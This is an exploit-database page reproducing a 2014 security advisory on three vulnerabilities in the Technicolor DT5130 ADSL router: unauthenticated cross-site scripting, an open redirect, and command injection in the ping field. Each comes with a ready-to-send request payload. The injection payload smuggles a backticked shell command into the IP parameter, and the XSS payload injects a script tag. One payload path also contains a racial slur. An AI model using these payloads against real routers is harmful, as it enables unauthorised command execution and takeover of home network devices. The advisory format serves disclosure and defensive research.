Skip to content
cyberexploits
webapphardwaretext

Technicolor DT5130 2.05.C29GV - Multiple Vulnerabilities

Technicolor DT5130 2.05.C29GV - Multiple Vulnerabilities

Publié le 2014-12-04

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/hardware/webapps/35462.txt7eac4c3a
raw
Product: Wireless N ADSL 2/2+ Modem Router

Firmware Version : V2.05.C29GV

Modem Type : ADSL2+ Router

Modem Vendor : Technicolor

Model: DT5130



Bugs:

1- Unauth Xss - CVE-2014-9142

user=teste&password=teste&

userlevel=15&refer=%2Fnigga.html&failrefer=/basicauth.cgi?index.html?failrefer=<script></script><script>alert('TESTE')</script>"%0A&login=Login&password=pass&refer=/index.html&user=teste&userlevel=15&login=Login



2- Arbitrari URL redirect - CVE-2014-9143

failrefer=http://blog.dclabs.com.br&login=Login&password=

pass&refer=/index.html&user=1&userlevel=15



3- Command Injection in ping field - CVE-2014-9144

setobject_token=SESSION_CONTRACT_TOKEN_TAG%3D0123456789012345&setobject_ip=s1.3.6.1.4.1.283.1000.2.1.6.4.1.0%3Dwww.google.com.br|`id`&setobject_ping=i1.3.6.1.4.1.283.1000.2.1.6.4.2.0%3D1&getobject_result=IGNORE





-- 

Ewerson Guimaraes (Crash)

Pentester/Researcher

DcLabs / Ibliss  Security Team

www.dclabs.com.br / www.ibliss.com.br
Voir sur GitHub